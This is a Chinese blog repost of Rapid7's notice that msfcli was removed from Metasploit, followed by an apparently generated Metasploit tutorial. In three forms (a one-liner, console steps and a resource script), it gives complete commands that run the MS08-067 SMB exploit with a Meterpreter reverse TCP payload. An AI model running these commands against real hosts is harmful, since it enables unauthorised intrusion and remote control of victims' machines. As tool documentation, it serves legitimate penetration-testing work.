msfcli 不能使用,在新版metasploit不再有效

原文地址:https://community.rapid7.com/community/metasploit/blog/2015/07/10/msfcli-is-no-longer-available-in-metasploit

Hi, 大家好,

     这个一月份,我们做了一份关于 Metasploit 的命令行版本接口版本 Msfcli 的声明,今天我们要对它说再见了。

     取代 Msfcli,我们推荐你在 Msfconsole 使用 -x 选项。

     举个例子,我们如何在一条命令中使用 MS08_067 模块。

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"

    你也可以把它在msfconsole中分步写或者做成脚本形式 (resource scripts) 或者设置别名来简化输入。

    下面举个例子如何在msfconsole中分步使用 MS08_067 模块。

use exploit/windows/smb/ms08_067_netapi
set RHOST [IP]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP]
run

    上面的命令也可以做成源脚本,然后输入以下命令使用

msfconsole -r name_of_resource_script.rc


  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit是一个广泛使用的渗透测试工具,用于发现和利用安全漏洞。下面是一个简要的Metasploit使用教程: 1. 安装Metasploit:你可以从官方网站(https://www.metasploit.com/)下载Metasploit框架。根据你的操作系统选择适当的版本,并按照安装指南进行安装。 2. 了解基础知识:在使用Metasploit之前,建议你对网络协议、漏洞利用和渗透测试等基础知识有一定的了解。这将帮助你更好地理解和使用Metasploit。 3. 启动Metasploit:安装完成后,你可以通过命令行或者图形界面启动Metasploit。启动后,你将看到一个交互式的命令行界面。 4. 扫描目标:在使用Metasploit之前,你需要扫描目标网络或主机来发现潜在的漏洞。你可以使用Nmap等工具进行端口扫描、服务识别等操作。 5. 选择并配置模块:Metasploit提供了许多不同类型的模块,包括扫描模块、漏洞利用模块、Payload模块等。你可以使用search命令查找相关模块,并使用use命令选择需要的模块。 6. 设置目标:使用set命令配置目标主机的IP地址、端口等信息。你还可以使用options命令查看和修改模块的参数设置。 7. 运行模块:配置完成后,你可以使用exploit命令运行模块。Metasploit将尝试利用已知漏洞攻击目标主机。 8. 获取访问权限:成功运行模块后,你可能会获得对目标主机的访问权限。这包括远程命令执行、文件上传/下载等功能。 请注意,Metasploit是一个强大的工具,需要在合法授权和合规的情况下使用。在进行任何渗透测试活动之前,务必遵循适当的法律和道德准则,并获得相关许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值